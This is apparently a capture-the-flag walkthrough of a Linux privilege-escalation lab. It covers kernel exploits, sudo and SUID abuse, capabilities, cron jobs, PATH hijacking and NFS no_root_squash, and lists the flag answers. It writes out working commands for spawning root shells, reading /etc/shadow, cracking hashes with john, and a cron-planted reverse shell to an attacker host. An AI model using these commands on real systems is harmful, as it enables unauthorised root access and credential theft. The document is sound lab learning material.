Privilege Escalation Nour Huwio 20200619

Task 1: Introduction

Task 2: What is privilege escalation

Task 3: Enumeration

 What is the hostname of the target system?

SSH into the system. You are met with a not-so nice shell. To upgrade it into an interactive shell, use
(providing python is installed on the system)

python -c 'import pty;pty.spawn("/bin/bash")'

Now to get the hostname of the target system, type hostname

Ans: wade7363
Privilege Escalation Nour Huwio 20200619

 What is the Linux kernel version of the target system?

Use cat /proc/version

Linux Kernel Version

Ans: 3.13.0–24-generic

 What Linux is this?

Ans: Ubuntu 14.04 LTS

 What version of the Python language is installed on the system?

You can check the python version with python --version

Ans: 2.7.6

 What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)

CVE-2015-1328
Privilege Escalation Nour Huwio 20200619

A quick Google search of your kernel would reveal its CVE-2015–1328What.

What is the Linux kernel version of the target system?

Linux version kernel is 3.13.0

Privilege Escalation Nour Huwio 20200619

Task 4: Automated Enumeration Tools

Privilege Escalation Nour Huwio 20200619

Task 5: Privilege Escalation: Kernel Exploits

 find and use the appropriate kernel exploit to gain root privileges on the target system.

download the exploit into the /tmp directory and run it as per the following instructions:

Instructions to compile the code and run the exploit

Here is the result:

Privilege Escalation Nour Huwio 20200619

Running the exploit on the target

Q: What is the content of the flag1.txt file?

We have root access on the system. First we have to locate the flag1.txt file.

Identifying the location of flag1.txt

Now, we print the file contents to grab the flag.

Flag obtained

Answer: THM-28392872729920

Task 6 — Privilege Escalation: Sudo

Q: How many programs can the user “karen” run on the target system with sudo rights?

The task mentions the command sudo -l for checking root privileges available to the current user.

Checking root privileges using ‘sudo -l’

We run the command to identify the programs the karen can run with sudo rights.
Privilege Escalation Nour Huwio 20200619

Identifying commands with sudo rights

Thus, karen can run three commands with sudo rights — find, less, and nano.

Answer: 3

Q: What is the content of the flag2.txt file?

First, let’s locate the flag2.txt file.

Identifying the location of flag2.txt using ‘locate’

The locate command does not work, so we will use the find command.

Identifying the location of flag2.txt using ‘find’

Let’s break down the command.

find Initiating the command for finding the required file

/ The directory in which we want to look for the file — here, we are looking into the entire file system
-type f Specifying the type of file or object we want to look for — 'f' stands for regular file
-name flag2.txt Specifying the name of the file

We have found the location of the file. Let’s now print its contents to grab the flag.

Flag obtained

We have access to the file, so we can read it

Answer: THM-402028394
Privilege Escalation Nour Huwio 20200619

Q: How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

The tasks provides the following hint in this regard:

GTFOBins

Let us check out the given link and see how we can use Nmap with sudo rights to spawn a root shell.

Nmap on GTFOBins

As shown in the second method, we can simply run the interactive mode to spawn a root shell.

Answer: sudo nmap --interactive

Q: What is the hash of frank’s password?

Password hashes are generally stored in the /etc/shadow file. Let’s check out whether we can access it
with our current privileges.

Trying to access /etc/shadow as a standard user

As expected, a standard user cannot access the file. We need to leverage the three commands we
identified that we can run with sudo rights.

Let’s try them all.

First, we will try the find command.

Let’s look into GTFOBins and get the command for spawning a root shell using find with sudo rights.
Privilege Escalation Nour Huwio 20200619

‘find’ command on GTFOBins

Let’s spawn a root shell to access the shadow file and search for frank’s password hash.

Obtaining frank’s password hash using ‘find’

There it is.

Now, let’s try the less command.

As the less command is used to print the contents of a file, we can simply run it with sudo rights to read
the shadow file directly. While GTFOBins provides a command to spawn a shell, we do not need it in this
case.

Obtaining frank’s password hash using ‘less’

There we go. Two commands down!

Finally, let’s try the nano command.

We will go back to GTFOBins for this one.

‘nano’ command on GTFOBins

Looks alright. Let’s give it a shot.

Privilege Escalation Nour Huwio 20200619

Trying the GTFOBins sudo exploit for ‘nano’ command

Typing sudo nano spawned a nano window. Then, we hit CTRL+R followed by CTRL+X, which brought the
input cursor to the Command to execute: field shown in the lower portion of the image. Now, we will
run reset; sh 1>&0 2>&0 in that prompt to spawn a root shell. Then, we will again access the shadow file
and grab the required password hash.

Obtaining frank’s password hash through ‘nano’-spawned root shell

And we have got the hash once again. Easy enough.

Answer: $6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/
BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1
Privilege Escalation Nour Huwio 20200619

Task 7 — Privilege Escalation: SUID

Q: Which user shares the name of a great comic book writer?

Let’s check the /etc/passwd file to identify the user who shares the name of a great comic book writer.

Accessing /etc/passwd for usernames

The user gerryconway appears to be the required username. (A quick google search confirms it is indeed
the name of a famous comic book writer.)

Answer: gerryconway

Q: What is the password of user2?

The task suggests searching for files with the SUID bit set. We will then leverage those files to access the
shadow file and grab the password hash of user2. We will (potentially) crack the hash to obtain the
required password.
Privilege Escalation Nour Huwio 20200619

SUID bit and the ‘find’ command

Among the resulting files, only /usr/bin/base64 has an entry on GTFOBins with the SUID flag set. Let’s try
it out to print the shadow file.

‘base64’ command on GTFOBins

As suggested in the image, we will skip the first command (and perhaps even the second one).

Accessing password hashes in /etc/shadow using ‘base64’ GTFOBins exploit

We have the password hashes of gerryconwayand user2. Let us use john — a Kali built-in hash-cracking
tool — to obtain the password of user2 from the hash. We will use the following command:
john --wordlist=/path/to/wordlist /path/to/hashfile
Privilege Escalation Nour Huwio 20200619

Cracking user2’s password hash using ‘john’

And we have the password of user2.

Let’s try cracking the password of gerryconway just for the fun of it.

Cracking gerryconway’s password hash using ‘john’

And we have cracked that too. Although not necessary, we can try cracking the password hashes of other
users if we are unable to escalate our privileges vertically. The other users could potentially have
different permissions or files that could be leveraged to get root access to the target system.

Answer: Password1

Q: What is the content of the flag3.txt file?

First, let’s locate flag3.txt.

Locating flag3.txt

Now that we have the location, we will use the base64 command to read the contents of flag3.txt just as
we did with the shadow file.
Privilege Escalation Nour Huwio 20200619

Flag obtained

We have the flag

Answer: THM-3847834

Task 8 — Privilege Escalation: Capabilities

Q: How many binaries have set capabilities?

Let’s check out the guide on how we can list binaries that have set capabilities.

Taking advantage of capabilities for privesc

As we are starting with an unprivileged user karen, we will redirect the error messages to /dev/null as
suggested.
Privilege Escalation Nour Huwio 20200619

Listing files with set capabilities

We have a list of six binaries with set capabilities.

Answer: 6

Q: What other binary can be used through its capabilities?

The guide shows us the exploit for the vim binary, so the other binary listed here that can be used
through its capabilities is view (/home/ubuntu/view).

Answer: view

Q: What is the content of the flag4.txt file?

First, let’s locate the flag4.txt file.

Locating the flag4.txt file

The flag4.txt file is readable by all users. So, we don’t even need to run any exploits to grab the flag. We
can simply print the file contents to the terminal and obtain the answer. First, let’s do it that way.

Obtaining the flag

We have the flag. It is quite unexpected that we didn’t even need to run any exploits for it. However, for
the sake of learning and keeping up with the guide, we will tag along with exploiting binaries with set
capabilities.

We identified the vim and view binaries using the getcap command earlier. We will try to spawn a root
shell using each binary with the help of GTFOBins. Let’s begin with vim.
Privilege Escalation Nour Huwio 20200619

Checking ‘vim’ capabilities on GTFOBins

As we don’t have sudo rights, we will just run the final command. However, we need to check the version
of Python installed on the system and alter the command accordingly.

Checking the version of Python installed on the system

We can see that the target system has Python3 installed, so we will use the Python3 version of the
exploit:
./vim -c ‘:py3 import os; os.setuid(0); os.execl(“/bin/sh”, “sh”, “-c”, “reset; exec sh”)’

Let’s give it a try.

Running the ‘vim’ exploit to spawn a shell

Privilege Escalation Nour Huwio 20200619

Obtaining the flag

Running the exploit spawns a blank root shell, so we simply print the contents of the flag4.txt file.

Now, let’s try the other binary — view. First, we will check out GTFOBins for the correct command.

Checking ‘view’ capabilities on GTFOBins

Again, we will replace :py with :py3 in the command for the exploit to work correctly. We need to either
make sure we are in the correct directory where the view binary is located or provide the complete path
to the binary.

Running the ‘view’ exploit to spawn a shell

Obtaining the flag

And we have the flag once again.

Answer: THM-9349843
Privilege Escalation Nour Huwio 20200619

Task 9 — Cron Jobs

Q: How many user-defined cron jobs can you see on the target system?

The walkthrough guides us on how to check the list of user-defined cron jobs.

Cron jobs in /etc/crontab

Let’s run the command and count the number of user-defined cron jobs.
Privilege Escalation Nour Huwio 20200619

Listing all cron jobs

We can see four user-defined cron jobs at the bottom.

Answer: 4

Q: What is the content of the flag5.txt file?

First, let’s locate the flag5.txt file.

Locating the flag5.txt file

We have located the file, but unlike the previous task, we cannot access the file directly. Let’s check out
what the cron jobs can do for us.

backup.sh scheduled to run every minute

Privilege Escalation Nour Huwio 20200619

Modifying the file to launch a reverse shell

Let’s begin with the backup.sh file as suggested in the guide. First, we will modify the file to create a
reverse shell and set up a listener on our local machine. We will hopefully receive a reverse connection
from the target system. the backup.sh file is scheduled to run every minute.

bash -i >& /dev/tcp/IP/Port 0>&1

Setting up a listener

After a few minutes of waiting, we did not receive any connection from the target machine. So, the first
point of action is to check the file permissions we will just use chmod +x in there to make the file
executable. That should hopefully fix the issue.
Privilege Escalation Nour Huwio 20200619

Finally, we have a reverse shell. Let’s quickly grab the flag from flag5.txt.

Nice and easy!

Answer: THM-383000283

Q: What is Matt’s password?

We have a reverse shell with root privileges, so we can simply print the shadow file, grab Matt’s
password hash, and crack the hash to obtain the password. Let’s do it.

There we go. We have cracked the password.

Privilege Escalation Nour Huwio 20200619

We could repeat the same steps with the /tmp/test.py binary. It appears that the file does not exist on
the target system, so we can simply create one with the same name and take the same steps to spawn a
root shell.

Additionally, in some cases, we can abuse a given script instead of modifying it entirely, as suggested
below.

Answer: 123456

Task 10 — Privilege Escalation: PATH

Q: What is the odd folder you have write access for?

We can obtain a list of folders we have write access for using the find command with the appropriate
permission flags. Let’s take a look at the complete command.

We have a -writable flag that can be set for ease of use. Let’s try it out on the target system to find the
odd folder required to answer this question.
Privilege Escalation Nour Huwio 20200619

The command produces a ton of results, and the only seemingly odd result is /home/murdoch. We are
using tail for the sake of a compact screenshot. It would otherwise hinder your progress.

Answer: /home/murdoch

Q: Exploit the $PATH vulnerability to read the content of the flag6.txt file.

First, let’s print the PATH variable and locate the flag6.txt file.

Now, let’s check out the guide.

So, we need to find a script/application that will run a command (thmin this case) in the context of a
different user or root itself. If the script does not specify the absolute path of the command, the OS will
search for the command in the folders listed under the PATH variable. If $PATH is modifiable, we will add
Privilege Escalation Nour Huwio 20200619

a writable folder to $PATH, create a file with the name of the command (thm), and specify what the
command should do.

That’s a lot to take in. Let’s get right into it.

A few quick searches in the /home folder later, we find a test file owned by root and with the SUID bit
set. It is executable by all users, so if we execute it, it will run with the privileges of the root user. Let’s
check out what it does.

It appears the file is trying to run the command thm but the OS is unable to find it in $PATH. We know
that /home/murdoch is a writable folder, so we will create a binary named thm in that folder and make
the binary spawn a shell. However, we will need to add the folder to $PATH first.

The example shows us how to add /tmp to $PATH , but we will replace /tmp with /home/murdoch. Note
that it would be better to perform the exploit through /tmp as interfering with a user’s home directory is
not the best idea, but we are not working on a real engagement, so we might as well.

Now, we will create an executable named thm in the /tmp/murdoch directory and make it spawn a shell.
Privilege Escalation Nour Huwio 20200619

Let’s carry out the same steps.

There we go. Now, if we run the test script, it should hopefully try to run the thm binary
within /home/murdoch, which will give us a root shell. Let’s see how that works out.

And we have root. Clean and simple.

Now, let’s read the contents of flag6.txt.

There we go. That was fun.

Q: What is the content of the flag6.txt file?

Let’s submit the flag as we have already read the contents of the flag6.txt file.

Answer: THM-736628929
Privilege Escalation Nour Huwio 20200619

Task 11 — Privilege Escalation: NFS

Q: How many mountable shares can you identify on the target system?

Let’s begin with the official guide.

We need to run the command shown above on our local machine. Let’s do it.
Privilege Escalation Nour Huwio 20200619

We can see that the target system has three mountable shares.

Answer: 3

Q: How many shares have the “no_root_squash” option enabled?

Let’s check out the official guide again.

Let’s check out the /etc/exports file on the target system.

Privilege Escalation Nour Huwio 20200619

We can see the three mounts listed at the bottom, and they all have the no_root_squash option
enabled.

Answer: 3

Q: Gain a root shell on the target system

The guide tells us how we can exploit the no_root_squash option on a mountable share.

Let’s continue following the guide on how to leverage this vulnerability to gain a root shell on the target
system.

As suggested, we will first create a temp folder and mount one of the no_root_squash shares to our local
machine. Then, we will create a simple executable that will spawn a shell.
Privilege Escalation Nour Huwio 20200619

We have mounted /home/backup folder to /tmp/test and created exploit.c containing a simple shell-
spawning script. Note that we need sudo privileges to mount the folder, and we will need them to
perform any actions on that folder. The -o flag of the mount command is used to specify additional
options or parameters. We are using the parameters rw, which stands for read-write, specifying read and
write permissions to the mounted folder.

Now, let’s compile the code and set the SUID bit.
Privilege Escalation Nour Huwio 20200619

Let’s check whether the files reflect in the folder that we have mounted — /home/backup on the target
system.

Well, although most of the information is not provided for some reason, we have confirmed that the files
exist on the target system. Let’s try executing exploit and hopefully pop a root shell.

Turns out, we do not have execute permissions on the /home/backup folder. A lot of time seemingly
wasted but something to learn nonetheless.

Let’s try the whole thing again, but this time with the /tmp folder.
Privilege Escalation Nour Huwio 20200619
Privilege Escalation Nour Huwio 20200619

Now, let’s check the situation of the target machine’s mounted folder — /tmp.

Perfect! We have got it working. Let’s execute exploit to finally pop a root shell.

Not so fast, I guess!

At this point, I realised I wouldn’t be able to pop a root shell anyway because I created the exploit on my
local machine through a standard user account — kali — as can be seen in the screenshots above.
Accordingly, on the target machine, the owner of the exploit is ‘ubuntu’, not the root user. So, even if the
exploit were to be executed, I would pop a standard shell, not a root shell. So, I had to redo the entire
process through the root user account. Moving on . . .

After some google-fu, I found three seemingly workable bypasses: using a helper script called XenSpawn,
which can be found here; adding the -static option to the compiler command for static linking; and
dependency bundling using LD_LIBRARY_PATH.

Let’s try the easy and obvious static flag.

Privilege Escalation Nour Huwio 20200619

We can also confirm that the executable exploit is owned by root this time around. Let’s run it.

And we finally have a root shell. This part took a lot of going back and forth and more time than
expected, but it was a worthy learning experience.

Q: What is the content of the flag7.txt file?

We have a root shell on the machine, so we will simply locate the flag7.txt file and print its contents to
the terminal.

Answer: THM-89384012
Privilege Escalation Nour Huwio 20200619

Task 12: Capstone Challenge

We will begin by checking whether we have any sudo privileges.

We cannot run sudo. Let’s check the command history of the user. There could be some hints or even
passwords left behind.
Privilege Escalation Nour Huwio 20200619

flag2.txt is located in the /home/rootflag directory. We also might need to compromise the missy user in
order to get root on the system, but we will focus on the current user first.
Privilege Escalation Nour Huwio 20200619

We have an empty directory named perl5 that is world-executable. I’m not sure where that would come
into play. Also, we get a permission denied error when we try to access /home/missy or /home/rootflag.

Exploited the base64 binary with the SUID bit set in Task 7. Let’s try it out again. This could be a case of
getting ahead of ourselves, but there’s no harm in trying to read the contents of the flag files directly
using base64. We are not sure where the two files might be located, so we will just
try /home/missy/flag1.txt and /home/rootflag/flag2.txt based on the information we gathered from
the history command.

the root flag was found and it appears that flag1.txt is located somewhere else.

As we can use the base64 binary with root privileges, we might as well grab the root user’s password
hash from the /etc/shadow file and try cracking it.
Privilege Escalation Nour Huwio 20200619

We now have the root user’s password hash. We also went ahead with grabbing missy’s password hash,
just in case.

we have cracked missy’s hash. It took longer to type the command than for john to crack the hash.

og in as missy and read the flag1.txt file to get the answer to the final question (as we already have
the root flag).

There’s the flag.

Although we will have technically completed the challenge by obtaining both flags, we will try to escalate
our privileges until we have compromised the root user. we begin by checking whether missy has
any sudo privileges.

We can run the find command with sudo privileges. We go to GTFOBins to make it through the root.
Privilege Escalation Nour Huwio 20200619

We have a root shell.

Q: What is the content of the flag1.txt file?

Answer: THM-42828719920544

Q: What is the content of the flag2.txt file?

Answer: THM-168824782390238